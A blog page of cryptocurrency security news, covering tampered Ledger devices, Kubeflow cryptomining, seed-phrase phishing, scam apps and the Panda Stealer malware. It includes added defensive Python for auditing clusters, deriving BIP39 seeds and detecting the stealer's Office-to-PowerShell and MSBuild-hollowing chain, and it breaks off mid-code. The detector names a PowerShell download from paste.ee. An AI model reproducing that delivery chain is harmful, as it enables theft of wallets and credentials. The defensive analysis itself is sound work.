Showing posts with label Crypto Currency.

Fraudsters are Mailing Modified Ledger Devices to Steal Cryptocurrency


Scammers are mailing fraudulent replacement devices to Ledger customers whose details were exposed in a recent data breach; the devices are used to steal cryptocurrency wallets. 

With cryptocurrency values rising and hardware wallets widely used to secure crypto funds, Ledger has become a frequent target for scammers. After receiving what appeared to be a Ledger Nano X device in the mail, a Ledger user described a devious fraud on Reddit. The device arrived in authentic-looking packaging with a sloppily written letter claiming that it had been sent to replace their existing device because their customer information had been leaked online on the RaidForums hacker community. 

"For this reason for security purposes, we have sent you a new device you must switch to a new device to stay safe. There is a manual inside your new box you can read that to learn how to set up your new device," states the fake letter from Ledger. 

"For this reason, we have changed our device structure. We now guarantee that this kinda breach will never happen again." 

Although the letter contained numerous grammatical and spelling errors, the information of 272,853 people who had purchased a Ledger device really had been published on the RaidForums hacking site in December 2020, which gave the new device's arrival a somewhat convincing pretext. 

The package also included a shrink-wrapped Ledger Nano X box containing what appeared to be a genuine device. Having become suspicious, the user opened it and posted photos of the printed circuit board on Reddit, which clearly showed that the device had been modified. 

Based on the photos, Mike Grover, a security researcher and offensive USB cable/implant expert, told BleepingComputer that the threat actors had added a flash drive and wired it to the device's USB port. 

Grover told BleepingComputer in a conversation about the photographs, "This appears to be a simple flash drive slapped on to the Ledger with the purpose of being for some form of malware delivery." 

"All of the components are on the other side, so I can't confirm if it is JUST a storage device, but.... judging by the very novice soldering work, it's probably just an off-the-shelf mini flash drive removed from its casing." 

Examining the image, Grover pointed out the wires connecting the flash drive implant, stating, "Those 4 wires piggyback the same connections for the USB port of the Ledger." 

The enclosed instructions tell the recipient to connect the Ledger to their computer, open the drive that appears, and run the application on it. The instructions then have the user enter their Ledger recovery phrase to import their wallet to the new device. 

A recovery phrase is a human-readable seed from which a wallet's private keys are derived. Anyone with the recovery phrase can import the wallet and gain access to the cryptocurrency it contains. Once the recovery phrase is entered, it is sent to the attackers, who use it to import the victim's wallet on their own devices and steal the funds it holds. 

Ledger has acknowledged this fraud and issued a warning about it in May on its dedicated page about phishing campaigns. 

Recovery phrases for Ledger devices should never be shared with anybody and should only be entered directly on the Ledger device being recovered. If the device does not allow the phrase to be entered directly, the user should only use the Ledger Live application downloaded directly from Ledger.com. 

Ledger customers flooded with scams: 

In June 2020, an unauthorized person gained access to Ledger's e-commerce and marketing databases, resulting in a data breach. 

This information was "used to send order confirmations and promotional mailings — largely email addresses, but with a subset that also included contact and order details including first and last name, postal address, email address, and phone number." 

Ledger owners began receiving phishing emails directing them to fraudulent Ledger apps designed to trick them into entering their wallet's recovery phrase. These scams became more common after the contact information of 270K Ledger owners was posted on the RaidForums hacker community in December. 

The leak resulted in phishing operations posing as new Ledger data breach notifications, SMS phishing texts, and software upgrades on sites imitating Ledger.com.

Kubeflow: The Target of Cryptomining Attacks


Microsoft has discovered a new, widespread, ongoing threat that aims to infect Kubernetes clusters running Kubeflow instances with malicious TensorFlow pods that mine cryptocurrencies. Kubeflow is a popular open-source framework for conducting machine learning (ML) tasks in Kubernetes, while TensorFlow is an end-to-end, open-source ML platform. 

Microsoft security experts cautioned on Tuesday that they had noticed a rise in TensorFlow pod deployments on Kubernetes clusters at the end of May — pods that were running legitimate TensorFlow images from the official Docker Hub account. A closer examination of the pods' entry point, however, revealed that they were being used to mine cryptocurrency. 

In a post on Tuesday, Yossi Weizman, a senior security research software engineer at Microsoft's Azure Security Center, said that the "burst" of malicious TensorFlow deployments was "simultaneous," implying that the attackers scanned the clusters first, kept a list of potential targets, and then fired on all of them at the same time. The attackers used two distinct images, according to Weizman. The first is the most recent version of TensorFlow (tensorflow/tensorflow:latest), and the second is the most recent version with GPU support (tensorflow/tensorflow:latest-gpu). 

According to Weizman, using TensorFlow images in the network "makes a lot of sense," because “if the images in the cluster are monitored, usage of a legitimate image can prevent attackers from being discovered.” Another rationale for the attackers' decision is that the TensorFlow image they chose is an easy way to conduct GPU activities using CUDA, which "allows the attacker to optimize the mining gains from the host," according to him. 

The newly found campaign is comparable to a cryptocurrency mining attack revealed by Microsoft in June. That earlier campaign also targeted Kubeflow workloads, launching a broad XMRig Monero-mining campaign by exploiting misconfigured dashboards. This time, according to Weizman, the attackers abused their access to the Kubeflow centralized dashboard to create a new pipeline.

Kubeflow Pipelines is a framework for creating machine learning pipelines based on Argo Workflow, an open-source, container-native workflow engine for coordinating parallel jobs. A pipeline is a collection of steps, each of which runs as its own container, that together make up an ML workflow. 

Users of Kubeflow should ensure that the centralized dashboard is not insecurely exposed to the internet, according to Microsoft.
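The two defensive points in this article, that image names alone are not enough to monitor and that the dashboard must not be exposed, can be turned into a cluster audit. The following is an added example, not Microsoft's, Kubeflow's or Kubernetes' own code: it reads the JSON shape produced by `kubectl get pods -A -o json` and `kubectl get svc -A -o json`, flags containers running a trusted image such as tensorflow/tensorflow:* with a replaced entry point (command/args), and lists Services of type NodePort or LoadBalancer in the namespaces that front the Kubeflow dashboard. The namespace list and the sample objects are constructed assumptions for this example.

```python
"""Audit pods and services for the abuse pattern described above.

Added example; not Microsoft's, Kubeflow's or Kubernetes' own code.
Check 1: containers that run a trusted image but override its entry point,
which an image-name-only monitor would miss.
Check 2: Services in dashboard namespaces reachable from outside the cluster.
The samples below are constructed, not captured from a real cluster.
"""
import json

TRUSTED_IMAGE_PREFIXES = ("tensorflow/tensorflow",)
# Assumption: namespaces whose Services expose the Kubeflow dashboard.
DASHBOARD_NAMESPACES = {"kubeflow", "istio-system"}
EXTERNAL_SERVICE_TYPES = {"NodePort", "LoadBalancer"}

# Constructed pod list: a stock notebook image and one with a replaced entry point.
SAMPLE_PODS = json.dumps({"items": [
    {"metadata": {"name": "notebook-0", "namespace": "kubeflow-user"},
     "spec": {"containers": [
         {"name": "tf", "image": "tensorflow/tensorflow:latest"}]}},
    {"metadata": {"name": "tf-worker-7c9", "namespace": "kubeflow"},
     "spec": {"containers": [
         {"name": "tf", "image": "tensorflow/tensorflow:latest-gpu",
          "command": ["/bin/sh", "-c"],
          "args": ["python3 /tmp/job.py"]}]}},
]})

# Constructed service list: a dashboard gateway exposed via LoadBalancer.
SAMPLE_SERVICES = json.dumps({"items": [
    {"metadata": {"name": "istio-ingressgateway", "namespace": "istio-system"},
     "spec": {"type": "LoadBalancer"}},
    {"metadata": {"name": "ml-pipeline", "namespace": "kubeflow"},
     "spec": {"type": "ClusterIP"}},
]})


def find_overridden_entrypoints(pod_list_json: str) -> list:
    """Return containers whose trusted image has its entry point overridden."""
    findings = []
    for pod in json.loads(pod_list_json).get("items", []):
        meta = pod.get("metadata", {})
        spec = pod.get("spec", {})
        for c in spec.get("containers", []) + spec.get("initContainers", []):
            image = c.get("image", "")
            if not image.startswith(TRUSTED_IMAGE_PREFIXES):
                continue
            if "command" in c or "args" in c:
                findings.append({
                    "namespace": meta.get("namespace"),
                    "pod": meta.get("name"),
                    "container": c.get("name"),
                    "image": image,
                    # What actually runs; review this, not the image name.
                    "entrypoint": " ".join(c.get("command", []) + c.get("args", [])),
                })
    return findings


def find_exposed_dashboard_services(svc_list_json: str) -> list:
    """Return Services in dashboard namespaces reachable from outside the cluster."""
    exposed = []
    for svc in json.loads(svc_list_json).get("items", []):
        meta = svc.get("metadata", {})
        if (meta.get("namespace") in DASHBOARD_NAMESPACES
                and svc.get("spec", {}).get("type") in EXTERNAL_SERVICE_TYPES):
            exposed.append(f"{meta['namespace']}/{meta['name']}")
    return exposed


if __name__ == "__main__":
    for f in find_overridden_entrypoints(SAMPLE_PODS):
        print("entry point override:", f)
    for s in find_exposed_dashboard_services(SAMPLE_SERVICES):
        print("externally exposed service:", s)
```

Legitimate pipeline steps also set command/args, so the first check yields review candidates rather than verdicts; the value is that it surfaces what actually executes instead of trusting the image tag. An externally exposed gateway is not wrong in itself, but it is the place to confirm that authentication is enforced in front of the dashboard.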

Cryptocurrency Addiction: Here's All You Need to Know!


Cryptocurrency addiction is defined as compulsive cryptocurrency trading and related behaviors that have negative implications in a person's life. Cryptocurrency addiction is a behavioral addiction that disrupts or destroys personal, familial, and leisure endeavors, similar to gambling addiction. 

Many of us enjoy the occasional wager or lottery flutter – but it only becomes a problem for roughly 9 people out of 1000. However, 70 persons out of 1000 engage in dangerous behavior that could become an issue in the future. 

Cryptocurrency traders, according to experts, exhibit the same behavioral addictions as problem gamblers. Although no data exist for the number of people addicted to cryptocurrency trading, Tony Marini, the lead counselor at Castle Craig Hospital in Peebles, said they are seeing an increasing number of people in Scotland. 

"This is the crack cocaine of gambling because it is so fast," he said. "It's 24/7. It's on your phone, your laptop, it's in your bedroom." In the last few years, the clinic has treated over 100 people with cryptocurrency addictions. Its constant availability and severe volatility are what bring people to his door, Mr. Marini said. 

"There are so many people out there that are trading cryptocurrency that is making money," he said. "And they're telling everyone that they're making money. We are not hearing from the people that are losing money."

Jake was a cryptocurrency trader who lost millions of pounds. He does not want his true identity revealed since he is still receiving treatment at one of the UK's few hospitals dedicated to patients who are addicted to betting on the value of the virtual currency. Jake originally purchased Bitcoin, the most widely used cryptocurrency, in 2015, but it wasn't until a major win a few years later that his trading became out of control.

"I can pinpoint the exact moment it became a problem," he said. "I had been eroding the sum I put aside, but I entered a trade, and I was willing to risk that last amount I had. I ended up making back pretty much everything I lost in a single trade. The feeling was one of absolute euphoria."

The market isn't the only thing that can go wrong. The technology behind cryptocurrency is notoriously complex, and if you're not vigilant, you could end up investing in a scam.

Ex-SEC Enforcer: Crypto Investors are Enabling Hackers


The founder of the Securities and Exchange Commission's internet enforcement bureau warned Thursday that investors in bitcoin and other digital currencies are helping online hackers. 

“Ransomware is hitting everywhere and they’re all collecting it in bitcoin because there’s no way they’re going to get caught. So you’re also enabling it,” John Reed Stark, who now heads his own cybersecurity firm, told CNBC in an interview. 

Stark stated that cryptocurrencies have almost no practical use, contrasting trading in them with the speculation that previously drove AMC Entertainment and other meme stocks like GameStop to great heights. Cryptocurrencies also need the registration and other procedures that would give them the transparency of U.S. capital markets, he added. 

“At least with GameStop and AMC you’re not necessarily hurting anyone. ... But with crypto, you are really hurting a lot of people, and that sort of risk I don’t think is a good one for society,” Stark said. 

He also called crypto the essence of ransomware, a type of malicious software that can disrupt and even block computer networks. 

Brazil's JBS, the world's largest meatpacker, has resumed most production after a weekend ransomware attack, the latest in a line of hacks. JBS blames hackers with links to Russia.

In May, Colonial Pipeline, the largest US fuel pipeline, paid a ransom after its operations were shut down for nearly a week. The FBI attributes the attack on Colonial Pipeline to DarkSide, a Russian-linked group that demanded $5 million to restore service. DarkSide eventually shut down after receiving $90 million in cryptocurrency payments, and last year roughly $406 million in crypto payments were made to cyberattackers. 

“The country is kind of falling apart from ransomware all because of crypto, and the main reason people own crypto is because they think someone else will buy it and make the price higher,” said Stark, who spent 18 years at the SEC’s Enforcement Division. “There’s no other reason to invest in it,” he stated.

Who Could be Behind the Whale Address that Owns Dogecoin Worth $12 Billion?


After this year's sudden spike in cryptocurrency prices, news outlets and traders have been speculating about who might be behind the famous Dogecoin whale address DH5yaieqoZN36fDVciNyRueRGvGLR3mr7L, which is worth 12 billion dollars. It has accumulated 36.7 billion Dogecoins since 2019, around 28% of the world's Dogecoin. 

It is fun to speculate that the address belongs to a single person who suddenly accrued billions of dollars' worth of the meme cryptocurrency, but Patrick Lodder, a Dogecoin core developer, said the address more likely belongs to a cryptocurrency exchange. 

Dogecoin is a cryptocurrency created by software developers Billy Markus and Jackson Palmer, who wanted to build a payment system as a joke poking fun at the wild speculation in cryptocurrencies at the time. Despite its humorous origins, some regard it as a valid investment opportunity. 

Dogecoin's value has dropped significantly in recent days, with China's ban on cryptocurrency trading one of the primary reasons for the drop. The earlier spike was largely driven by Tesla and SpaceX CEO Elon Musk, who promotes it on his social media pages. 

The story behind Dogecoin is no doubt one of the most interesting in crypto, and Elon Musk's ongoing tweets have given his fans the strongest connection to it. 

Lodder, who has worked on Dogecoin since 2014, explained that anyone can send Doge to a publicly known address, so coins entering an address are no "clue" to its owner's identity unless the value involved is significant. 

"These are all jokers, that probably has nothing to do with the operator of the wallet, that's just people having fun," he said. 

CoinDesk's head of research suggested that the address's inactivity could also indicate that the whale is an individual rather than an exchange. Lodder, however, said that this pattern of operation suggests the address is an exchange's cold storage. An exchange holding a large amount of Dogecoin would likely not keep it on an online server, but would move its assets into more secure offline storage such as a cold storage wallet. 

"This looks like somebody getting a lot of money into custody and putting that into a cold storage wallet so that it's more secure," Lodder told Business Insider. 

Many guesses about who owns the address have been posted on online forums. One Reddit user, who mostly tracks on-chain data, suspects the whale address is one of Robinhood's several Dogecoin addresses, specifically one of its cold storage wallets. Others believe the address belongs to the "father of Dogecoin", Elon Musk. 

Such rumors, Lodder said, could in theory be dangerous for a cryptocurrency like Doge. He added that speculation about a whale could prompt people to sell their Doge for fear that the whale would dump all of theirs. 

He said that if the address belongs to an exchange, it would be helpful for the exchange to say so. Most cryptocurrency exchanges do not reveal their Dogecoin or other cryptocurrency addresses. 

"It would be helpful for the dogecoin community, not even just doge but all crypto, if there was a good way to either independently verify that the books of a custodial exchange are in order, or to have an audit report from a professional firm that does the audit and certifies that everything is fine," said Lodder.

DeFi100, a Crypto Project, Allegedly Scammed Investors of $32 Million


According to reports and tweets, DeFi100, a cryptocurrency project, allegedly defrauded investors out of $32 million (roughly Rs. 233 crores). The project has now denied the allegations, but some skepticism remains. Rumors that the people behind the project had fled with the money began to circulate after a very distasteful message appeared on its website on Sunday. The message on the DeFi100 website read, "We scammed you guys, and you can't do **** about it." DeFi100 has since clarified that its website was hacked and that the hackers placed the message, which has since been removed.

“DeFi100 coin exit scams, and runs away with $32 million, and leaves a message for all of us. Feels like the summer of 2017,” tweeted Kashif Raza, co-founder of Cryptokanoon. 

DeFi100 is a cryptocurrency similar to Bitcoin, Dogecoin, and Ethereum, among others. It is, however, much less well-known than the other well-known digital assets. The website was still down at the time of publishing. “Oops, looks like the page is lost. This is not a fault, just an accident that was not intentional,” is what it says now. 

On Sunday, the crypto project announced on its official Twitter account that it had not exited as previously thought. “Firstly, total supply of D100 at present is less than 4 million tokens. At the beginning of the project, total supply was 2.5 million tokens. Secondly, D100 was never a yield farming protocol, which was holding investors funds with TVL over 32 million,” it said in a tweet. 

“Thirdly, total tokens sold during IDO were 750,000 at $0.80 per token. These facts are available in public for checking their authenticity. The rumours of stealing $32 million are absolutely false and baseless," it added in the subsequent tweet. "We reiterate it again that we have not made any exit." 

Although the DeFi100 founders have stated that they did not defraud investors, nothing can be said for certain until the website is up and running again. The value of D100, DeFi100's native token, has dropped 25% in the last 24 hours to $0.08 (roughly Rs. 6), according to a CoinDesk article. 

The reports of DeFi100 developers defrauding their investors came just days after the FBI, the US's main law enforcement agency, announced that it had received a record 1 million complaints related to online scams and investment frauds in the previous 14 months.

The youngest crypto millionaire Mr. Buterin destroyed almost $7 billion worth of Shiba tokens donated to him

Ethereum creator and crypto millionaire Vitalik Buterin destroyed more than 410 trillion Shiba tokens, which CoinDesk values at a total of $6.7 billion. According to Etherscan, Buterin sent the coins to a non-existent address, thereby removing them from circulation.

In a note attached to the transaction, Buterin explained that he had decided to destroy 90% of the Shiba tokens he owned. The billionaire plans to send the rest of the funds to charity.

He has previously donated more than 50 trillion Shiba tokens (almost a billion dollars) to the fight against coronavirus in India.

Earlier, the creators of Shiba transferred half of all issued coins to the wallet of the founder of Ethereum to attract attention to their cryptocurrency. In his note, Buterin asked all the creators of cryptocurrencies to no longer send him tokens without his consent.

The mass destruction of tokens has not yet affected the Shiba token exchange rate. According to Coingecko, since the morning of May 17 the value of the cryptocurrency has held at about 0.000016 dollars per token.

Transaction fees, however, have decreased. According to Bitinfocharts, the average transaction fee on the Ethereum network has fallen by 74% over the past five days.

Yuri Pripachkin, president of the Russian Association of Cryptocurrencies and Blockchain, added that any destruction of the mass of tokens leads to an increase in the price.

"This is a PR campaign to attract attention to Ethereum. This is a marketing move, Vitalik Buterin has the right to do so," Pripachkin said.

According to him, meme-cryptocurrencies will not have a serious future, and people who take everything that happens with meme tokens seriously "do not cause anything but a surprise."

It is worth noting that in early May, 27-year-old programmer Vitalik Buterin became the youngest cryptocurrency billionaire in the world. Buterin's wallet contains more than 333 thousand Ethereum tokens, the price of which has increased 25 times since the beginning of last year.

Buterin was born in Russia but moved to Canada with his parents at an early age.

Crypto Tumble is Testing the Durability of the Cryptocurrency Boom


The rapid and broad retreat of virtual currencies is putting the cryptocurrency boom to the test. After a bruising U.S. session that shocked the cryptocurrency world, Bitcoin and Ether remained under strain. 

During Asian trading, the two most common digital tokens retreated to this week's lows before recovering. As of 12:09 p.m. in Hong Kong, bitcoin had fallen as much as 8.7% and was trading at $39,270. Ether was down as much as 15% at one stage, but it later recovered. 

In the last week, the value of more than 7,000 tokens monitored by CoinGecko has dropped by more than $600 billion to $1.9 trillion. Bitcoin, the most popular cryptocurrency, fell 11% on Wednesday, breaking below $40,000 for the first time, and is now around $25,000 below its April high. 

Several factors are at play, ranging from criticism by onetime promoter Elon Musk of the environmental effects of Bitcoin's energy usage to the possibility of a regulatory crackdown on what has been dubbed the "Wild West of investing." The returns from digital tokens have been so large that some traders may simply have been taking profits. 

According to Jeffrey Halley, senior market analyst at Oanda, the $40,000 mark is a "critical make-or-break pivot stage" for Bitcoin, and a drop to just below $30,000 isn't out of the question.

Early in April, the market capitalization of cryptocurrencies surpassed $2 trillion for the first time, more than doubling in less than two months on expectations that institutional investors would become more active. About $600 billion has been lost as a result of the current weakness. According to Mike McGlone, a commodity strategist at Bloomberg Intelligence in New York, bitcoin tested its 200-day moving average, and its discount to the 120-day average is the largest since last year. He expects the price of Bitcoin to settle around the $49,000 average in 2021. 

Bitcoin's price to gold ratio has fallen to its lowest level since early February. This comes as investors become more cautious of risky assets, as well as the economy's post-pandemic recovery. Bitcoin supporters argue that it is a modern-day store of value, but the token's volatility contradicts this argument. 

A continuing recovery in Ether, the second-largest cryptocurrency, attracted attention after Bitcoin pulled back from a mid-April peak. But that, too, has come to a halt. In a note published on Monday, Chris Weston, head of research at Pepperstone Group Ltd. in Melbourne, said he was closing a short Bitcoin/long Ether trade because the "dust just needs to settle."

Trust Wallet & MetaMask Crypto Wallets: Targeted by New Support Scam


Users of Trust Wallet and MetaMask wallets are the targets of ongoing malicious Twitter phishing attacks aimed at stealing cryptocurrency funds. MetaMask and Trust Wallet are mobile apps that enable users to create wallets to store, buy, send, and receive cryptocurrency and NFTs. 

When users first open the MetaMask or Trust Wallet apps, they are prompted to create a new wallet. The app then displays a 12-word recovery phrase and encourages users to save it somewhere safe as part of this procedure. This recovery phrase is used by the apps to generate the private keys needed to enter the wallet. Anyone who knows the recovery phrase can import the wallet and access the cryptocurrency funds it contains. 
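Both this article and the Ledger article above rest on the same fact: the recovery phrase is the wallet, because every key is derived from it deterministically. The following added example, which is not code from either article nor from MetaMask, Trust Wallet or Ledger, implements the public BIP39 and BIP32 derivations with only the Python standard library: the words are stretched with PBKDF2-HMAC-SHA512 into a 64-byte seed, and HMAC-SHA512 of that seed yields the master private key and chain code from which all account keys descend. The test inputs are the published BIP39 English test vector (all-zero entropy, passphrase "TREZOR"), not a real wallet.

```python
"""BIP39 recovery phrase -> wallet seed -> BIP32 master key.

Added example, not code from the articles or from any wallet vendor. It
follows the public BIP39/BIP32 specifications with the standard library
only, to show why the 12 or 24 words are equivalent to the wallet's private
keys: nothing else is needed to reproduce them.
"""
import hashlib
import hmac
import unicodedata


def mnemonic_to_seed(mnemonic: str, passphrase: str = "") -> bytes:
    """BIP39: PBKDF2-HMAC-SHA512, 2048 rounds, salt = "mnemonic" + passphrase.

    Both strings are NFKD-normalised as the spec requires. The 64-byte output
    is the seed from which every key in the wallet is derived.
    """
    words = unicodedata.normalize("NFKD", " ".join(mnemonic.split()))
    salt = unicodedata.normalize("NFKD", "mnemonic" + passphrase)
    return hashlib.pbkdf2_hmac("sha512", words.encode("utf-8"),
                               salt.encode("utf-8"), 2048, dklen=64)


def seed_to_master_key(seed: bytes) -> tuple:
    """BIP32: HMAC-SHA512(key=b"Bitcoin seed", data=seed).

    Left half is the master private key, right half the chain code; all
    account and address keys in the wallet are derived from these two values.
    """
    digest = hmac.new(b"Bitcoin seed", seed, hashlib.sha512).digest()
    return digest[:32], digest[32:]


# Constructed inputs: the published BIP39 English test vector (all-zero entropy).
TEST_MNEMONIC = ("abandon abandon abandon abandon abandon abandon "
                 "abandon abandon abandon abandon abandon about")
TEST_PASSPHRASE = "TREZOR"
TEST_SEED_HEX = ("c55257c360c07c72029aebc1b53c05ed0362ada38ead3e3e9efa3708e5349553"
                 "1f09a6987599d18264c1e1c92f2cf141630c7a3c4ab7c81b2f001698e7463b04")


def demo() -> dict:
    """Derive the seed and master key, and show the phrase alone fixes them."""
    seed = mnemonic_to_seed(TEST_MNEMONIC, TEST_PASSPHRASE)
    priv, chain = seed_to_master_key(seed)
    # Same words with a different (here: empty) passphrase -> a different wallet.
    other = mnemonic_to_seed(TEST_MNEMONIC)
    return {
        "seed_hex": seed.hex(),
        "master_priv_hex": priv.hex(),
        "chain_code_hex": chain.hex(),
        "passphrase_changes_seed": other != seed,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The derivation has no secret other than the words (and an optional passphrase), which is why a phishing form that collects the phrase collects the whole wallet, and why a phrase typed into anything but the wallet device itself should be treated as compromised.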

For the past two weeks, BleepingComputer has been monitoring a Twitter phishing scam that targets Trust Wallet and MetaMask users and steals cryptocurrency wallets by spreading fake technical support forms. The scam begins with genuine MetaMask or Trust Wallet users tweeting about a problem with their wallets, such as stolen funds, trouble accessing their wallets, or trouble using the apps. 

Scammers respond to these tweets by posing as members of the app's support team or users who claim that "Instant support" helped them with the same problem. Users are encouraged to fill out a support form by visiting the included docs.google.com or forms.app links. 

Users who click on these links are taken to a page that looks like a support form for Trust Wallet or MetaMask. The forms ask for the visitor's email address, name, the problem they're having, and then the scam's crown jewel: the wallet's 12-word recovery phrase. Threat actors can use a Trust Wallet or MetaMask user's recovery phrase to import the victim's wallet on their own devices and steal all of the deposited cryptocurrency funds.

Unfortunately, there is nothing that a user can do to recover funds after they have been stolen by a threat actor. Phishing scams involving cryptocurrency have previously been extremely popular, with one MetaMask user losing over $30,000 in cryptocurrency after sharing their recovery phrase. 

Trust Wallet and MetaMask users should never share their wallet's recovery phrase or type it into any app or website. Furthermore, a legitimate organization would not use Google Docs or online form-building sites for support requests. Seek help only through the official support channels of the app or service you are having trouble with. 

When it comes to cryptocurrencies and financial assets, the user should always type the URL they wish to visit into their browser rather than relying on links in emails, as it is simple to build lookalike domains that impersonate legitimate sites. This way, users can avoid mistakenly clicking on phishing sites that impersonate a legitimate service.

167 Fake iOS & Android Trading Apps Brought to Light by Researchers


Sophos, a worldwide leader in cybersecurity, has found 167 fake Android and iOS apps that criminals have been using to rob people who believe they have installed a genuine, trustworthy financial trading, banking, or cryptocurrency app. A research article titled ‘Fake Android and iOS apps disguised as trading and cryptocurrency apps’ describes how the criminals used social engineering, fake websites including a fake iOS App Store page, and an iOS app-testing service to deliver the fake apps to unsuspecting users. 

Sophos researchers found that the fake apps were all very similar to one another. Many included an embedded "chat" feature for customer support, and when the researchers contacted the support teams through it, the answers were almost identical. They also discovered a single server hosting 167 counterfeit trading and cryptocurrency apps. Taken together, Sophos says, this suggests that all of the fraud might be run by the same group. 

In one of the scenarios examined, the scammers approached victims through a dating app, creating a profile and exchanging messages with a target before encouraging them to download a counterfeit app and deposit money and cryptocurrency into it. When the targets later tried to withdraw funds or close the account, the attackers blocked their access. 

In other instances, the targets were lured by websites built to resemble a reputable company, such as a bank. To convince users that they were installing an app from the genuine App Store, the scammers even built a fake "iOS App Store" download page with fabricated customer reviews. 

When visitors tapped the links to install the fake Android or iOS apps, they received what looked like a mobile app but was actually only a web clip: a shortcut icon pointing at a fake website. 

The operators also delivered fake iOS apps through third-party websites that help developers test new apps with a small number of Apple device users before submitting them to the official App Store. 

“People trust the brands and people they know – or think they know – and the operators behind these fake trading and cryptocurrency scams ruthlessly take advantage of that,” said Jagadeesh Chandraiah, a senior threat researcher at Sophos. “The fake applications we uncovered impersonate popular and trusted financial apps from all over the world, while the dating site sting begins with a friendly exchange of messages to build trust before the target is asked to install a fake app. Such tactics make the fraud seem very believable.”

“To avoid falling prey to such malicious apps, users should only install apps from trusted sources such as Google Play and Apple’s app store. Developers of popular apps often have a website, which directs users to the genuine app and, if they have the skills to do so, users should verify if the app they are about to install was created by its actual developer. Last, but not least, if something seems risky or too good to be true – high returns on investment or someone from a dating site asking you to transfer money or cryptocurrency assets into some ‘great’ account – then sadly it probably is,” he further added.

Sophos also recommends installing an anti-virus program on the mobile device, such as Intercept X for Mobile, to defend Android and iOS devices from cyber attacks.

$2 Million Cryptocurrency Controversy Linked with WallStreetBets Investors


According to a Bloomberg News story, a cryptocurrency scam recently took at least $2 million from WallStreetBets investors by enticing them to invest in new crypto coins associated with the famous meme-stock community. 

Moderators of the infamous Reddit forum have for weeks been warning users about fraud that trades on WSB's reputation. A published post calls on members of the community to be wary of offers of WSB-branded items. 

“People keep posting a press release about an official Wall Street Bets distributed app. (Aka, a crypto pyramid scheme). Nothing could be further from the truth. We are strongly anti-monetization. This scam has nothing to do with us,” as per the report. 

Many people missed the memo, and a number of WSB enthusiasts have recently been scammed by exactly this kind of offer. Recently, an offer circulated on the chat app Telegram from an account calling itself "Wall Street Bets — Crypto Pumps." "Crypto Pumps" claimed to give WSB enthusiasts the chance to invest in a new crypto token called "WSB Finance." In cryptocurrency circles such an arrangement is called a "presale," which lets early investors buy a token before it reaches exchanges and wider public distribution. 

Potential buyers were instructed to send Binance Coin or Ether to a crypto wallet and then contact a "token bot" that would transfer the WSB Finance tokens to them. Before long, ETH and BNB were flowing into Crypto Pumps' wallet. 

Then came a twist for the buyers. Soon after the coins had been pocketed, "Crypto Pumps" announced that the bot was faulty, and that users would have to send more crypto payments or “lose their initial investment,” Bloomberg reports. 

Naturally, the "WSB Finance" tokens never existed, and no coins ever appeared. Whoever the fraudsters were, they made off with some 3,451 Binance Coin, worth about $2.1 million in real-world currency, and may also have collected an unspecified amount of Ether. 

Before the “Crypto Pumps” profile disappeared from Telegram, the page’s administrator had one final message to share. The fraudster wanted victims to know how the ill-gotten winnings would be spent: “Buying Lambo now,” they said.

Panda Stealer Spreads Via Discord to Steal User Crypto-Currency


A new type of malware, Panda Stealer, is spreading through a global spam campaign. Trend Micro researchers reported on Tuesday that they first encountered the stealer in April. The latest wave of the spam campaign appears to have hit Australia, Germany, Japan, and the USA hardest. 

The spam emails disguise booby-trapped Excel attachments as nothing more than a business quote request to lure victims. Researchers found 264 Panda Stealer-like files on VirusTotal, some of which are being exchanged by threat actors operating via Discord. 

Given recent developments, this isn't shocking. Cisco's Talos team noticed recently that some threat actors are using workflow and communication tools such as Slack and Discord to sneak past security controls and deliver stealers, remote access trojans (RATs), and other malware. Threat actors may now likewise be using Discord to distribute Panda Stealer. 

Once Panda has established itself on a system, it attempts to gather information such as private keys and past transaction records for cryptocurrency wallets including Bytecoin (BCN), Dash (DASH), Ethereum (ETH), and Litecoin (LTC). Besides stealing wallets, it can also pilfer credentials from applications such as NordVPN, Telegram, Discord, and Steam. Panda can also take screenshots and swipe browser data, including cookies and passwords, from infected computers. 

The researchers identified two ways in which the spam infects victims. In one infection chain, an .XLSM attachment contains macros that install a loader, which in turn executes the stealer. In the other, an .XLS attachment contains an Excel formula that launches a PowerShell command to access paste.ee, a Pastebin alternative, which in turn serves a second, encrypted PowerShell command. 

"The CallByName export function in Visual Basic is used to call a load of a .NET assembly within memory from a paste.ee URL," Trend Micro says. "The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL." 
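The two infection chains above leave a distinctive process lineage on the endpoint: an Office process launching PowerShell that pulls from paste.ee, and a hollowed MSBuild.exe whose parent is not a build tool. The following is an added detection example, not Trend Micro's or the blog's code; the event field names, the parent allow-list and the sample events are assumptions built to resemble Sysmon process-creation records.

```python
"""Flag process-creation events matching the Panda Stealer delivery chain.

Added example (not Trend Micro's code). Two rules:
  1. an Office process spawning PowerShell, with a stronger verdict when the
     command line references paste.ee (the Excel-formula chain), and
  2. MSBuild.exe launched by something other than a build tool, which is what
     the in-memory loader's process hollowing looks like from the outside.
"""
import re
from dataclasses import dataclass
from typing import List

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Parents from which MSBuild.exe normally runs (assumed allow-list).
LEGIT_MSBUILD_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe", "cmd.exe"}
PASTE_HOST = re.compile(r"paste\.ee", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    image: str          # basename of the created process
    parent_image: str   # basename of the parent process
    cmdline: str


def alerts_for(event: ProcEvent) -> List[str]:
    """Return zero or more alert strings for a single event."""
    img = event.image.lower()
    parent = event.parent_image.lower()
    out = []
    if parent in OFFICE and img in {"powershell.exe", "pwsh.exe"}:
        reason = "Office process spawned PowerShell"
        if PASTE_HOST.search(event.cmdline):
            reason += " fetching from paste.ee (Panda Stealer XLS chain)"
        out.append(f"pid {event.pid}: {reason}")
    if img == "msbuild.exe" and parent not in LEGIT_MSBUILD_PARENTS:
        out.append(f"pid {event.pid}: MSBuild.exe started by {parent} "
                   "(possible process-hollowing host)")
    return out


def scan(events: List[ProcEvent]) -> List[str]:
    alerts = []
    for e in events:
        alerts.extend(alerts_for(e))
    return alerts


# Constructed sample events; the paste.ee path is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(100, "EXCEL.EXE", "OUTLOOK.EXE", '"EXCEL.EXE" quote_request.xls'),
    ProcEvent(101, "powershell.exe", "EXCEL.EXE",
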